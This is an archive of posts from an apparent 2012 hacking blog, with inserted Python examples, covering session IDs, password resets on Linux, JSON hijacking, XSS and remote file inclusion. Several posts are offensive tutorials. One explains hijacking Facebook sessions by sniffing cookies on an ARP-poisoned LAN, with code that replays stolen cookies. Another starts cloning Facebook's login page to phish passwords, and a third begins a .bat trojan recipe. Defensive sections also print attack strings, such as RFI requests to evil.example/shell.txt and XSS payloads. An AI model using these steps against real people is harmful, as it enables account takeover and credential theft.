Tuesday, July 10, 2012

Session ID Analysis

In this tutorial we focus on session ID analysis. If you are not familiar with session IDs, here is a quick explanation. HTTP is a stateless protocol, so it is more like walkie-talkies or CB radios than a phone call: you send a request and wait for a reply, and there is no continuously open line between you and the server. To emulate one, the web application hands you a session ID, usually carried in a cookie, and you send it back with every request. The session ID is a bearer token: the application treats whoever presents it as the user who logged in, which is why it must be impossible to guess and why analysing how it is generated is worth the effort. So there is the quick and dirty intro to session IDs. The next logical question is how this process works, or better, how it should work. Let's use a web mail application as an example:
  1. You log in to your web mail account.
  2. Your web mail provider sends you a "random" cookie that is tied to your login session.
  3. Each time you click on a new message within your Inbox your cookie is sent along to prove who you claim to be, so that you get your own next message and not another person's. If that cookie were predictable (a counter, a timestamp, a hash of your username), anyone could compute another user's cookie and read that user's mail instead.
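As an added example (not from the post), here is the analysis itself in Python: given a sample of IDs the application handed out, it measures how much each character position varies, lists the positions that never change, and checks whether the IDs simply count upwards. It runs on two constructed generators, a counter-based one that stands in for a bad implementation and one that draws from the OS CSPRNG, which is what a server should use.

```python
import math
import secrets
from collections import Counter


def shannon_entropy_bits(symbols):
    """Shannon entropy, in bits, of one sample of symbols (here: the characters
    seen at one position across all captured IDs)."""
    n = len(symbols)
    return -sum((c / n) * math.log2(c / n) for c in Counter(symbols).values())


def is_sequential(ids):
    """True when the IDs, read as hex integers, climb by a constant positive step;
    such IDs can be guessed by anyone who has seen one of them."""
    try:
        nums = [int(i, 16) for i in ids]
    except ValueError:
        return False
    steps = {b - a for a, b in zip(nums, nums[1:])}
    return len(steps) == 1 and steps.pop() > 0


def analyse_session_ids(ids):
    """Per-position entropy of a sample of fixed-length IDs, the positions that
    never change, and whether the sample is a plain counter."""
    length = len(ids[0])
    if any(len(i) != length for i in ids):
        raise ValueError("this analysis assumes fixed-length IDs")
    per_position = [shannon_entropy_bits([i[pos] for i in ids]) for pos in range(length)]
    return {
        "length": length,
        "fixed_positions": [pos for pos, bits in enumerate(per_position) if bits == 0.0],
        # upper bound: positions are treated as independent of each other
        "estimated_bits": sum(per_position),
        "sequential": is_sequential(ids),
    }


def weak_ids(n, start=0x1000):
    """Constructed weak scheme: a constant prefix followed by a counter."""
    return ["deadbeef%08x" % (start + k) for k in range(n)]


def strong_ids(n):
    """What the server should do instead: 64 bits from the OS CSPRNG per ID,
    which is the usual minimum recommendation for session ID entropy."""
    return [secrets.token_hex(8) for _ in range(n)]


if __name__ == "__main__":
    for label, sample in (("weak", weak_ids(32)), ("strong", strong_ids(32))):
        print(label, analyse_session_ids(sample))
```

The weak sample scores about five bits of entropy in sixteen characters, fourteen positions never change and the IDs are sequential; the strong sample scores well above forty bits from the same number of samples, which is the difference a tester is looking for.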

Speaking Leet : Language of Hackers

To speak leet, you more or less need to un-learn proper English. The history of leet goes back to the early days of online message boards, or forums, where users post messages to carry on a threaded conversation. In an attempt to clean up the language that users would sometimes post, admins added a filtering system to the message board which replaced restricted words with some alternative. For example, the word "crap" might become "crud." It didn't take people long to figure out that you could get around this filter simply by altering the original word somehow, like changing "crap" to "c-r-a-p" or "krap" or "crrrap." It was soon obvious that these filtering systems could never possibly cover every variation, because people would just keep inventing new ones, and so leet was born.

How to find or remove the Virus?

If you've let your guard down (or even if you haven't) it can be hard to tell if your PC is infected. Here's what to do if you suspect the worst.
Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you’ll lose all your data, and you’ll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.
You know they’re right. Yet for one reason or another, you’re not running antivirus software, or you are but it’s not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you’ve put off renewing.
It happens. It’s nothing to be ashamed of. But chances are, either you’re infected right now, as we speak, or you will be very soon.

Resetting Ubuntu 11.10 Password

Hey Guys,
If you've forgotten your Ubuntu 11.10 password you can reset it within minutes. I will tell you two methods to reset your Ubuntu password. The first is by booting in recovery mode and the second is by using any Live OS.

Let's start with recovery mode, as it takes less time and is easier than the second method:

Boot up your Ubuntu. Press and hold the Shift key while the machine is booting. You will get the GRUB menu like this:



Select the second option, 'Recovery Mode', and press Enter. The system will start booting and you will get a list of options like this:

Internet Access In Backtrack Virtual Machine

Hey Guys,
I've found that some people are struggling to get internet access in their BackTrack virtual machine through their USB modem, so today I am going to tell you how you can access the internet in your virtual machine via your data card.
Open the Network Adapter settings (Run -> ncpa.cpl).
Right-click on your USB modem adapter and go to Properties.




Cracking Linux Password when Grub cannot be changed

In the previous post we learnt how to reset a Linux password using GRUB by dropping to single user mode. That method edits the kernel command line from the GRUB menu, so if GRUB is password protected it will not work. (Neither method recovers the old password; both set a new one.) In such cases we can use a Linux Live CD instead. Follow the steps below to change the Linux password using a Live CD.
  1. Boot your computer from your Linux Live CD, choosing “Try Linux without any change to your computer” from the boot menu.
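As an added example (not part of this post or of the Ubuntu 11.10 recovery-mode post above), here is what both methods come down to, in Python: the recovery-mode root shell remounts / read-write and runs passwd; the Live CD method mounts the installed root partition and runs passwd inside a chroot, which is how step 1 above is normally continued; and either way the only thing that changes is the second field of the user's line in /etc/shadow. The editor below makes that change on a constructed shadow file, so it can be run anywhere; the device name /dev/sda1, the mount point /mnt/target, the user alice and the hash strings are assumptions.

```python
import os
import tempfile
import time

SHADOW_FIELDS = 9  # name:hash:lastchg:min:max:warn:inactive:expire:flag, see shadow(5)


def recovery_mode_commands(user):
    """Method 1: what you type at the 'root - Drop to root shell prompt' entry of
    the recovery menu.  The root filesystem is mounted read-only there, so it is
    remounted before passwd can write /etc/shadow.  Assumed user name."""
    return [["mount", "-o", "remount,rw", "/"], ["passwd", user]]


def livecd_commands(root_dev, user, mountpoint="/mnt/target"):
    """Method 2: from a Live CD, mount the installed root partition and chroot into
    it so that passwd edits the installed /etc/shadow rather than the Live CD's.
    root_dev (e.g. /dev/sda1) is an assumption; find it with lsblk or fdisk -l."""
    return [
        ["mkdir", "-p", mountpoint],
        ["mount", root_dev, mountpoint],
        ["chroot", mountpoint, "passwd", user],
        ["umount", mountpoint],
    ]


def set_shadow_hash(shadow_path, user, new_hash, today_days=None):
    """What both methods come down to: replace the hash field of `user` in a
    shadow file.  new_hash is a crypt(3) string (make one with
    `openssl passwd -6 'NewPassword'`); '!' or '*' locks the account instead.
    Returns True if the user was found."""
    if today_days is None:
        today_days = int(time.time() // 86400)
    out, found = [], False
    with open(shadow_path) as fh:
        for line in fh:
            fields = line.rstrip("\n").split(":")
            if len(fields) == SHADOW_FIELDS and fields[0] == user:
                fields[1] = new_hash
                fields[2] = str(today_days)  # lastchg: avoids a forced change at next login
                found = True
            out.append(":".join(fields) + "\n")
    if found:
        tmp = shadow_path + ".tmp"
        with open(tmp, "w") as fh:
            fh.writelines(out)
        os.chmod(tmp, 0o640)  # shadow must stay unreadable to ordinary users
        os.replace(tmp, shadow_path)  # atomic swap; never leave a half-written shadow
    return found


def get_shadow_entry(shadow_path, user):
    """Return the user's shadow line as a list of fields, or None."""
    with open(shadow_path) as fh:
        for line in fh:
            fields = line.rstrip("\n").split(":")
            if fields[0] == user:
                return fields
    return None


# Constructed shadow file, not copied from any real system.
SAMPLE_SHADOW = (
    "root:*:15000:0:99999:7:::\n"
    "alice:$6$salt$oldhash:15000:0:99999:7:::\n"
)


def make_sample_shadow():
    path = os.path.join(tempfile.mkdtemp(), "shadow")
    with open(path, "w") as fh:
        fh.write(SAMPLE_SHADOW)
    return path


if __name__ == "__main__":
    print(recovery_mode_commands("alice"))
    print(livecd_commands("/dev/sda1", "alice"))
    path = make_sample_shadow()
    set_shadow_hash(path, "alice", "$6$salt$newhash")
    print(get_shadow_entry(path, "alice"))
```

Editing the file directly (pointing set_shadow_hash at /mnt/target/etc/shadow from the Live CD) is the variant to use when chroot is not possible, for example when the Live CD and the installed system differ in architecture.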

BackTrack 5 Released – The Most Advanced Linux Security Distribution & LiveCD

We have of course been following BackTrack since the very early days, way back in 2006 when it was just known as BackTrack – A merger between WHAX and Auditor.  They’ve come a long way and BackTrack is now a very polished and well rounded security distro, most of the others have dropped off the map leaving BackTrack as the giant in the security LiveCD space.
The last major release was BackTrack 4 Final, back in January 2010.

The BackTrack dev team has worked furiously in the past months on BackTrack 5, code name "revolution"; they released it on May 10th. This new revision has been built from scratch and boasts several major improvements over all previous releases. It is based on Ubuntu Lucid LTS with kernel 2.6.38, patched with all relevant wireless injection patches, and is fully open source and GPL compliant.

Monday, July 9, 2012

How To Hack Facebook Account Using Wireshark

In this tutorial we will look at how you can hack a Facebook account using Wireshark. First of all, be clear that even though you will get access to the victim's account you will not get his or her password: what you steal is the session cookie, which works only until the victim logs out or the session expires, and it can only be captured from traffic sent over plain HTTP, so a session that runs entirely over HTTPS exposes nothing to the sniffer. Next, this trick works directly only on a LAN with a hub. It will also work on a switched LAN, but then you have to perform ARP poisoning first; click the link to know more.
I will not discuss how to use Wireshark here; please read our previous tutorials for that.

For this hack you will need Wireshark, which is a packet sniffing tool, the Mozilla Firefox web browser and the Add N Edit Cookies add-on for Firefox. Now I assume you have all of the above components and you are connected to a hub-based LAN, or a LAN that has been ARP poisoned. So now click on the capture button and start capturing packets.
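To make the capture step concrete, here is an added Python example (not the post's own material) that does by hand what Wireshark's HTTP dissector and the cookie editor do for you: it parses a constructed plaintext request, pulls the Cookie header apart per host, and rebuilds the request a hijacker's browser would send with the stolen cookies. The second constructed capture is the start of a TLS handshake, which shows why an HTTPS-only session gives this attack nothing to work with. Host name, cookie names and values are made up.

```python
# Constructed captures, not real traffic: one plaintext HTTP request as a sniffer
# on a hubbed (or ARP-poisoned) LAN would see it, and the first bytes of a TLS
# handshake for comparison.
CAPTURES = [
    (
        b"GET /home.php HTTP/1.1\r\n"
        b"Host: www.social.example\r\n"
        b"User-Agent: Mozilla/5.0\r\n"
        b"Cookie: uid=100000123456; sess=8f3a1c9e2b7d4e6f; locale=en_US\r\n"
        b"Accept: text/html\r\n\r\n"
    ),
    b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03",  # TLS ClientHello: nothing readable
]


def parse_http_request(raw):
    """Return (method, path, headers) for a plaintext request, or None if the
    bytes are not an HTTP request (for example an HTTPS session)."""
    head, sep, _ = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    try:
        lines = head.decode("ascii").split("\r\n")
        method, path, version = lines[0].split(" ")
    except (UnicodeDecodeError, ValueError):
        return None
    if not version.startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def extract_cookies(headers):
    """Split a Cookie request header into a name -> value dict."""
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def sniff_sessions(captures):
    """Group captured cookies per host: the list a hijacker pastes into the
    browser's cookie editor.  Non-HTTP captures (TLS) are skipped."""
    sessions = {}
    for raw in captures:
        parsed = parse_http_request(raw)
        if parsed is None:
            continue
        _, _, headers = parsed
        host = headers.get("host")
        if host:
            sessions.setdefault(host, {}).update(extract_cookies(headers))
    return sessions


def build_replay_request(host, path, cookies):
    """The request the hijacker's browser sends with the stolen cookies: no
    password involved, the cookie alone identifies the victim's session."""
    cookie_header = "; ".join("%s=%s" % kv for kv in cookies.items())
    return (
        "GET %s HTTP/1.1\r\nHost: %s\r\nCookie: %s\r\n\r\n" % (path, host, cookie_header)
    ).encode("ascii")


if __name__ == "__main__":
    sessions = sniff_sessions(CAPTURES)
    for host, cookies in sessions.items():
        print(host, cookies)
        print(build_replay_request(host, "/home.php", cookies).decode())
```

The defence follows directly from the code: a site that serves every authenticated page over HTTPS and sets the Secure flag on its session cookie never puts that Cookie header on the wire in the clear.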

What Is Phishing

Here in this post we will discuss a little about what phishing is. Please note that what we cover here is just the basics and not a phishing tutorial. In a phishing attack, an attacker creates a fake login page of a legitimate website and lures the victim into logging in through it. The site under attack is known as the phished site and the fake login page used for capturing or stealing information is known as the phished page. To perform a phishing attack an attacker performs the following steps.
First of all he gets a free web host and then selects a domain which somehow resembles the site he wants to phish. For example, to hack Gmail passwords he/she may select a domain like Gmial. Look carefully: both words appear nearly the same when only glanced at, and that is where the attacker makes the catch.
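Picking the look-alike domain is mechanical, and defenders generate the same list to register or monitor it. The following is an added Python example, not from the post: it produces the typo and homoglyph variants of a label (gmial, gmai1, grnail and so on) and scores a candidate domain against the legitimate one with an edit distance that counts a swap of adjacent letters as a single change. It assumes two-label domains like gmail.com, and the homoglyph table is a small ASCII-only one.

```python
# Small ASCII homoglyph table (an assumption; real lists include Unicode confusables).
HOMOGLYPHS = {
    "l": ("1", "i"),
    "i": ("l", "1"),
    "o": ("0",),
    "m": ("rn",),
    "w": ("vv",),
}


def lookalike_labels(label):
    """Variants of one domain label built the way a phisher picks one: adjacent
    transpositions (gmail -> gmial), omissions (gmai), doubled letters (gmaill)
    and homoglyph swaps (gmai1, gmaii, grnail)."""
    variants = set()
    for i in range(len(label) - 1):
        variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for i in range(len(label)):
        variants.add(label[:i] + label[i + 1:])
        variants.add(label[:i + 1] + label[i] + label[i + 1:])
        for sub in HOMOGLYPHS.get(label[i], ()):
            variants.add(label[:i] + sub + label[i + 1:])
    variants.discard(label)
    return sorted(variants)


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, plus an
    adjacent transposition counted as one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def registrable_label(domain):
    """The label before the TLD (assumes a plain two-label TLD such as .com)."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_lookalike(candidate_domain, legit_domain, max_distance=1):
    """Flag a domain whose registrable label is within max_distance edits of the
    legitimate one, or is a homoglyph variant of it (grnail is two edits away
    from gmail but still reads as gmail at a glance)."""
    cand = registrable_label(candidate_domain)
    legit = registrable_label(legit_domain)
    if cand == legit:
        return False
    return osa_distance(cand, legit) <= max_distance or cand in lookalike_labels(legit)


if __name__ == "__main__":
    print(lookalike_labels("gmail"))
    for d in ("gmial.com", "grnail.com", "mail.gmail.com", "yahoo.com"):
        print(d, is_lookalike(d, "gmail.com"))
```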

How To Hack Facebook Account | Phishing

In this tutorial we will discuss how you can hack a Facebook account password by phishing. Phishing is the act of creating a replica of a legitimate website for stealing passwords, credit card numbers and so on. Here I will show you how you can create a replica of the Facebook log-in page and then fool your victim into putting his username and password into it so that you get his account password.

First of all open www.facebook.com in your web browser, from the "File" menu select "Save as", type "Facebook" in the file name and select "Web page, complete" from the save-as menu. Once done you will have a file named "Facebook.html" and a folder named "Facebook_files". The folder will have several files in it; leave them as they are and open Facebook.html in Notepad or WordPad. From the Edit menu select Find, type action in it and locate the following string.

JSON XSRF Attacks


Welcome to another episode of Cross Site Request Forgery Attacks on DEVILS BLOG ON SECURITY. In this post we will discuss a little about JSON hijacking. You might ask why we haven't covered JSON XSRF attacks along with the other XSRF attacks. The short answer is that the other XSRF attacks are built, directly or indirectly, from session management weaknesses, frame injection flaws and cross site scripting, whereas a JSON XSRF attack works differently: instead of forging a state-changing request, the attacker's page loads the victim's authenticated JSON response as a script and reads the data out of it. Many professionals object to calling this XSRF at all, but the label does not matter here. So let's see how JSON XSRF attacks differ from other XSRF attacks.

JSON XSRF Attacks


In our last post on JSON XSRF attacks we saw some basics. In this section we will look at how to find and exploit a JSON vulnerability. As told in the previous post, the problem arises when an AJAX application returns its data as JSON (rather than XML) in a form that is also valid JavaScript, such as a bare top-level array or a callback wrapper, and serves it to any request that carries the victim's cookies. Here are the steps to find out whether a site is vulnerable:


  • If the web application uses AJAX, check the response Content-Type of its data endpoints for JSON or JavaScript, and look at the body: a top-level array or a callback(...) wrapper can be loaded cross-domain with a script tag, whereas a top-level object cannot.
  • Now determine whether a cross-domain request can be made: if the endpoint is authenticated by cookies alone, check the transferred parameters. If they are the same for each request, or are predictable, there is no per-request secret and the web application is vulnerable.
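The two checks above, written as code. This is an added Python example, not from the post: classify_json_response applies the content-type and script-loadability tests to one response, predictable_params flags parameters that never change between requests, and harden_json_body with parse_hardened shows the server-side fix (a non-array top level plus a prefix that breaks script loading but is trivially stripped by the legitimate XMLHttpRequest caller). The sample bodies are constructed, and auth_by_cookie_only stands in for the result of your cross-domain check.

```python
import json
import re

JSON_TYPES = {"application/json", "text/json", "text/javascript",
              "application/javascript", "application/x-javascript"}
# Prefixes that make the body a syntax error or an infinite loop when loaded
# as a script; the first is the one harden_json_body uses.
ANTI_HIJACK_PREFIXES = (")]}',", "while(1);", "for(;;);")
JSONP_RE = re.compile(r"^\s*([A-Za-z_$][\w$]*)\s*\((.*)\)\s*;?\s*$", re.S)


def classify_json_response(content_type, body, auth_by_cookie_only):
    """Check one AJAX response.  'exposed' is True when a page on another origin
    could load the body with a script tag and read it: the body is a bare array
    or a JSONP call, nothing breaks script parsing, and cookies alone
    authenticate the request (no custom header or per-request token)."""
    ctype = content_type.split(";")[0].strip().lower()
    result = {"in_scope": ctype in JSON_TYPES, "prefixed": False,
              "jsonp_callback": None, "top_level_array": False, "exposed": False}
    if not result["in_scope"]:
        return result
    payload = body.lstrip()
    for prefix in ANTI_HIJACK_PREFIXES:
        if payload.startswith(prefix):
            result["prefixed"] = True
            payload = payload[len(prefix):]
            break
    m = JSONP_RE.match(payload)
    if m:
        result["jsonp_callback"] = m.group(1)
        payload = m.group(2)
    try:
        data = json.loads(payload)
    except ValueError:
        return result
    result["top_level_array"] = isinstance(data, list)
    script_loadable = result["top_level_array"] or result["jsonp_callback"] is not None
    result["exposed"] = script_loadable and not result["prefixed"] and auth_by_cookie_only
    return result


def predictable_params(requests):
    """Second check from the post: parameters whose value never changes across
    the captured requests carry no per-request secret.  requests is a list of
    dicts of query/form parameters."""
    names = set().union(*(r.keys() for r in requests))
    return sorted(n for n in names if len({r.get(n) for r in requests}) == 1)


def harden_json_body(obj):
    """Server-side fix: never return a bare array, and add a prefix that is a
    syntax error when the response is loaded as a script."""
    wrapped = obj if isinstance(obj, dict) else {"data": obj}
    return ANTI_HIJACK_PREFIXES[0] + "\n" + json.dumps(wrapped)


def parse_hardened(body):
    """What the legitimate XMLHttpRequest caller does: strip the prefix, then parse."""
    prefix = ANTI_HIJACK_PREFIXES[0]
    if body.startswith(prefix):
        body = body[len(prefix):]
    return json.loads(body)


if __name__ == "__main__":
    # Constructed responses, not captured from any real site.
    leaky = '[{"user": "alice", "email": "alice@example.test"}]'
    print(classify_json_response("application/json", leaky, auth_by_cookie_only=True))
    print(classify_json_response("text/javascript", "cb([1,2,3]);", auth_by_cookie_only=True))
    print(classify_json_response("application/json", harden_json_body([1, 2]), True))
    print(predictable_params([{"uid": "7", "tok": "a1"}, {"uid": "7", "tok": "b2"}]))
```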

SSL And TLS Attacks | SSL Man In The Middle

In our last post we discussed a little about attacking weak ciphers; in this post we will look at how a Man In The Middle (MITM) attack can be performed against SSL and TLS encrypted connections. The attack uses sslstrip, developed by Moxie Marlinspike, together with an ARP spoofing tool and a packet sniffer; sslstrip runs on UNIX and Linux platforms, and arpspoof from the dsniff suite is the usual companion. sslstrip does not break the encryption: it sits between the victim and the server, speaks HTTPS to the server and plain HTTP to the victim, and rewrites the https:// links and redirects it relays so that the victim's browser never upgrades to HTTPS. It therefore works only when the victim starts from a plain-HTTP page or a typed address, which is the gap HSTS was later introduced to close. The null-character certificate vulnerability that affected several certificate authorities in 2009 was a separate finding by the same researcher and is not what sslstrip relies on.


I think it is not good to demonstrate how the attack can be performed since Moxie Marlinspike has already provided a nice tutorial on his own website with a video.

Cross Site Scripting (XSS) | The Basics


In this post we will take a basic look at Cross Site Scripting. Cross site scripting is also known as XSS, and people sometimes abbreviate it as CSS (which properly means Cascading Style Sheets, hence the X). XSS is a web application attack, not a web server attack: it occurs when a web application takes input and places it into a page without validation and context-appropriate encoding, which gives an attacker the chance to run a script of his choosing in other users' browsers, under the vulnerable site's origin. The vulnerability arises because pages are dynamic: content is assembled from JavaScript, VBScript, ActiveX controls, Flash content and scripts, and sometimes plain HTML, and any of those can carry the injected payload.
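An added Python example, not from the post, of the mechanics described above: the same input rendered without encoding and with context-appropriate encoding, in body, attribute and URL contexts. The half-fix of stripping only angle brackets is included because it is a common mistake: inside an attribute the breakout character is the quote, not the bracket. reflects_unescaped is a minimal probe of the kind a scanner runs; the canary string and the page fragments are constructed.

```python
import html
from urllib.parse import quote


def render_unsafe(name):
    """The bug in one line: untrusted input concatenated into HTML."""
    return "<p>Hello, " + name + "</p>"


def render_safe(name):
    """HTML body context: escape <, >, & and both quote characters."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_attr_unsafe(value):
    """A common half-fix: angle brackets are stripped but quotes are not, so the
    attribute can be closed early and an event-handler attribute appended."""
    cleaned = value.replace("<", "").replace(">", "")
    return '<input name="q" value="' + cleaned + '">'


def render_attr_safe(value):
    """Attribute context: html.escape with quote=True keeps the value inside the quotes."""
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


def render_url_safe(query):
    """URL context needs a different encoder: percent-encode the value, then
    HTML-escape the attribute that carries the URL."""
    url = "/search?q=" + quote(query, safe="")
    return '<a href="' + html.escape(url, quote=True) + '">search</a>'


CANARY = "xz<\"'>"  # marker followed by every character that matters in HTML


def reflects_unescaped(render):
    """Minimal reflection probe: push the canary through a render function and
    report whether any of its special characters come back intact."""
    out = render(CANARY)
    idx = out.find("xz")
    if idx < 0:
        return False
    tail = out[idx + 2: idx + 2 + 4]  # the four characters right after the marker
    return any(ch in tail for ch in "<\"'>")


if __name__ == "__main__":
    payload = "<script>alert(1)</script>"
    print(render_unsafe(payload))
    print(render_safe(payload))
    print(render_attr_unsafe('" onmouseover="alert(1)'))
    print(render_attr_safe('" onmouseover="alert(1)'))
    for fn in (render_unsafe, render_safe, render_attr_unsafe, render_attr_safe, render_url_safe):
        print(fn.__name__, "reflects unescaped:", reflects_unescaped(fn))
```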

Making your own trojan in a .bat file

Open a DOS prompt; we will only need a DOS prompt and Windows XP.
-Basics-
Opening a DOS prompt: go to Start, then Run, type
cmd and press OK.
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
OK, in this tutorial we will use 3 of the commands listed here;
they are: net user, net share and net send.
We will select some of those commands and put them on a .bat file.
What is a .bat file?
A .bat file is a piece of text that Windows will execute as commands, one line at a time.
Open Notepad and write there:

Sunday, July 8, 2012

Hack a Website Using Remote File Inclusion




Remote file inclusion (RFI) is one of the most common vulnerabilities found in web applications. It arises when a script builds the name of a file to include from user input, so an attacker can point it at a file hosted on a server he controls. If the attack succeeds, the included file runs on the web server with the privileges of the web server process, and the attacker can execute commands on it.
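An added Python example, not from the post: a mirror of the classic PHP pattern include($_GET['page'] . '.php') next to an allow-listed version, plus a scan over constructed access-log lines for the tell-tale query value that starts with a remote scheme (the trailing ? is what attackers append so that the script's own .php suffix lands in the query string and is ignored). The page directory /var/www/app/pages, the page names and the log lines are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlparse

PAGES_DIR = "/var/www/app/pages"  # assumed layout
ALLOWED_PAGES = {"home", "about", "contact"}
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "data", "php", "expect"}


def resolve_include_vulnerable(page_param):
    """Python mirror of include($_GET['page'] . '.php'): the parameter is trusted,
    so 'http://evil.example/shell.txt?' makes the server fetch and run attacker
    code; the appended '.php' becomes part of the URL's query string."""
    return page_param + ".php"


def resolve_include_hardened(page_param):
    """Allow-list the page name and build the path from a fixed directory; the
    user value never becomes a URL or a path component of its own."""
    if page_param not in ALLOWED_PAGES:
        raise ValueError("unknown page: %r" % page_param)
    return posixpath.join(PAGES_DIR, page_param + ".php")


def is_remote_target(value):
    """True when a parameter value is a URL with a scheme PHP's include would fetch."""
    return urlparse(value).scheme.lower() in REMOTE_SCHEMES


REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def find_rfi_attempts(log_lines):
    """Scan access-log lines (combined format) for query parameters whose value
    is a remote URL; returns (line, param, value) triples.  URL-encoded values
    are decoded by parse_qs, so the encoded variant is caught too."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        query = urlparse(m.group(1)).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if is_remote_target(value):
                    hits.append((line, param, value))
    return hits


# Constructed access-log lines, not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Jul/2012:10:12:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Jul/2012:10:12:07 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 2048',
    '203.0.113.9 - - [08/Jul/2012:10:12:09 +0000] "GET /index.php?page=http%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.1" 200 2048',
]


if __name__ == "__main__":
    print(resolve_include_vulnerable("http://evil.example/shell.txt?"))
    print(resolve_include_hardened("about"))
    for line, param, value in find_rfi_attempts(SAMPLE_LOG):
        print("RFI attempt:", param, "=", value)
```

The allow-list also closes the local variant of the same bug (page=../../etc/passwd), since a traversal string is not in the set either; disabling allow_url_include in PHP removes the remote half at the platform level but is no substitute for validating the parameter.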